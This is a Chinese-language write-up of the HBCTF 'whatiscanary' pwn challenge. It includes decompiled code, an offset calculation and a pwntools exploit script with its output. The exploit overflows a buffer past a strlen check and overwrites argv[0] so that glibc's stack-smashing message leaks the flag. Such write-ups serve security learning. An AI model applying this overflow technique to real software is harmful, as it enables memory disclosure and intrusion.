HBCTF whatiscanary

开始做之前不知道是简单题,因为没看wp,既然做了,就发出来吧

exp之前

NX + CANARY

CANARY很多时候直接覆盖argv即可

1
2
3
4
5
6
gdb-peda$ checksec 
CANARY : ENABLED
FORTIFY : disabled
NX : ENABLED
PIE : disabled
RELRO : Partial

main函数,两个函数,一个读取flag文件到bss全局变量上,另一个是漏洞函数

1
2
3
4
5
6
7
8
9
10
11
int __cdecl main()
{
setvbuf(stdin, 0, 2, 0);
setvbuf(stdout, 0, 2, 0);
setvbuf(stderr, 0, 2, 0);
puts("hello, welcome to HBCTF!");
openFlag(&unk_804A0A0);
vuln();
puts("exit");
return 0;
}

漏洞函数,name存在溢出,不过有strlen检测,这个00截断,很容易绕过

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
int vuln()
{
char name; // [sp+Ch] [bp-2Ch]@1
int v2; // [sp+2Ch] [bp-Ch]@1

v2 = *MK_FP(__GS__, 20);
printf("input your name(length < 10):");
sub_804878A(&name);
if ( (signed int)strlen(&name) > 10 )
{
puts("error, will exit!");
exit(0);
}
printf("hello, '%s', wish you have a good result!\n", &name);
return *MK_FP(__GS__, 20) ^ v2;
}

开始

本地测试先生成flag文件

1
echo "flag{whatiscanary}" > flag

我们运行起来看看,看看flag是不是在那

1
2
gdb-peda$ x /s 0x804A0A0
0x804a0a0: "flag{whatiscana"...

由于canary会输出argv中的程序名,那么这题覆盖argv为flag地址即可

偏移计算

1
char name; // [sp+Ch] [bp-2Ch]@1

python手算

1
2
3
4
>>> 0x2c
44
>>> 44+4
48

其中4为ebp占用4字节

所以最终payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
# -*- coding: utf-8 -*-
from pwn import *
p = process('./whatiscanary')

p.recvuntil("hello, welcome to HBCTF!\n")
p.recvuntil("input your name(length < 10):")

flag_addr = 0x804A0A0

payload = "aaaa\x00"
payload += "a" * (48 - len(payload))
payload += p32(flag_addr) * 100

p.sendline(payload)

p.interactive()

结果:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
root@kali:~/learn/pwn/HBCTFwhatiscanary# python exp.py 
[+] Starting local process './whatiscanary': pid 22162
[*] Switching to interactive mode
hello, 'aaaa', wish you have a good result!
*** stack smashing detected ***: flag{whatiscanary}
terminated
======= Backtrace: =========
/lib/i386-linux-gnu/libc.so.6(+0x698aa)[0xf76398aa]
/lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x37)[0xf76cc9e7]
/lib/i386-linux-gnu/libc.so.6(+0xfc9a8)[0xf76cc9a8]
flag{whatiscanary}
[0x8048851]
flag{whatiscanary}
[0x804a0a0]
======= Memory map: ========
08048000-08049000 r-xp 00000000 08:01 527067 /root/learn/pwn/HBCTFwhatiscanary/whatiscanary
08049000-0804a000 r--p 00000000 08:01 527067 /root/learn/pwn/HBCTFwhatiscanary/whatiscanary
0804a000-0804b000 rw-p 00001000 08:01 527067 /root/learn/pwn/HBCTFwhatiscanary/whatiscanary
09839000-0985a000 rw-p 00000000 00:00 0 [heap]
f75d0000-f7787000 r-xp 00000000 08:01 1316984 /lib/i386-linux-gnu/libc-2.25.so
f7787000-f7788000 ---p 001b7000 08:01 1316984 /lib/i386-linux-gnu/libc-2.25.so
f7788000-f778a000 r--p 001b7000 08:01 1316984 /lib/i386-linux-gnu/libc-2.25.so
f778a000-f778b000 rw-p 001b9000 08:01 1316984 /lib/i386-linux-gnu/libc-2.25.so
f778b000-f778e000 rw-p 00000000 00:00 0
f7793000-f77ae000 r-xp 00000000 08:01 1331725 /lib/i386-linux-gnu/libgcc_s.so.1
f77ae000-f77af000 r--p 0001a000 08:01 1331725 /lib/i386-linux-gnu/libgcc_s.so.1
f77af000-f77b0000 rw-p 0001b000 08:01 1331725 /lib/i386-linux-gnu/libgcc_s.so.1
f77b0000-f77b4000 rw-p 00000000 00:00 0
f77b4000-f77b6000 r--p 00000000 00:00 0 [vvar]
f77b6000-f77b8000 r-xp 00000000 00:00 0 [vdso]
f77b8000-f77db000 r-xp 00000000 08:01 1315428 /lib/i386-linux-gnu/ld-2.25.so
f77db000-f77dc000 r--p 00022000 08:01 1315428 /lib/i386-linux-gnu/ld-2.25.so
f77dc000-f77dd000 rw-p 00023000 08:01 1315428 /lib/i386-linux-gnu/ld-2.25.so
ff7f3000-ff814000 rw-p 00000000 00:00 0 [stack]
[*] Process './whatiscanary' stopped with exit code -6 (SIGABRT) (pid 22162)
[*] Got EOF while reading in interactive
打赏专区